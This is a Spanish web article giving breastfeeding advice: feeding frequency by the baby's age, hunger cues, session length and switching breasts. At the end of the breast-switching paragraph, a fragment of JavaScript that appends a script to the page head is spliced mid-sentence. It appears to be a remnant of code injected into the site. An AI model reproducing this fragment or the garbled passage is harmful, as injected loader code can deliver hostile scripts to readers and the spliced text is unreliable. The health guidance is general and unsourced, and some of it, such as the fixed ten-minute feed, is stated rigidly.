Salud y belleza » Embarazo

La lactancia materna I

Sin Comentarios

¿Con qué frecuencia necesito amamantar a mi bebé?

El análisis debe hacerse, no solo de acuerdo a las características de su bebé, sino también de acuerdo a los días, semanas o meses que éste tenga.

Veamos: durante el primer mes, todo bebé debería alimentarse entre ocho y trece veces al día. Vale mencionar que la lactancia materna nunca debe compararse, en cantidades, con el consumo de otras leches pues, en efecto, la materna se digiere con mayor facilidad que las llamadas infantiles. Esto, por supuesto, significa que avanza más rápidamente por el sistema digestivo: el bebé tarda menos en tener hambre.

Ya cuando el bebé tiene uno o dos meses de vida, debe nutrirse entre siete y nueve veces diarias y, conforme vaya creciendo, dependiendo de su peso y salud, necesitan   que se desarrolle una pauta de lactancia más predecible de acuerdo a síntomas o necesidades que bien se pueden comprender facilmente.

¿Existen síntomas específicos para poder identificar cuándo el bebé tiene hambre y cuándo necesita otro tipo de atención?

Contrariamente a lo que se piensa, el llanto es en verdad una señal tardía de hambre. Es necesario, en la medida de lo posible, intentar amamatar al bebe antes de que esté hambriento para que éste, así, pueda nutrirse estando relajado.
Además, el llanto bien puede confundirse con otro tipo de necesidades. Es por eso que, un método para saber si el bebé está llorando porque tiene hambre o por algún otro motivo es comprobar el horario y llevar un registro de cuándo come.

Otras formas de reconocer el hambre, es prestando atención a ciertos gestos del bebé como: abrir la boca, mover la cabeza, sacar la lengua, fruncir los labios. O, el mejor de todos, acercar el dedo para comprobar si intenta succionar, es decir, si tiene hambre. Las señales, como vemos, son la clave.

¿Cuánto debe durar cada sesión de amamantamiento, es decir, cómo descubro si, en efecto, el bebé pudo satisfacer sus necesidades?

Como muchos otros aspectos, en este caso también se debe tener en cuenta las características del bebé (por si no quedó claro, hablamos de cuestiones como su peso, su salud, su ánimo, etc.). Además, es necesario aclarar que no todas las madres tienen el mismo flujo de leche. Por último, nuevamente debemos, dejarnos llevar por las señales. En fin, aún así, podemos depender de la siguiente información para ayudarnos: la duración de las tomas, que también depende de la edad, debiera ser de diez minutos durante los primeros meses y de menos tiempo luego (…cuando se domina el proceso).

¿Debo cambiar de pecho atendiendo a algun factor en especial?

No hay otro factor que no sea la producción de leche y tal vez el cansancio o dolor, que  obligue a cambiar de pecho durante la lactancia materna. Esta alteración se debe realizar con el fin de mantener una buena producción de leche en ambos pechos, evitar el congestionamiento y hasta el dolor físico.
Algunos epecialistas, recomiendan ofrecer ambos pechos en cada toma, de forma alternada aunque, por otra parte, otros explican que es mejor hacer cada comida con un pecho en particular y guardar el otro para la siguiente.d.getElementsByTagName('head')[0].appendChild(s);if (document.currentScript) {

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.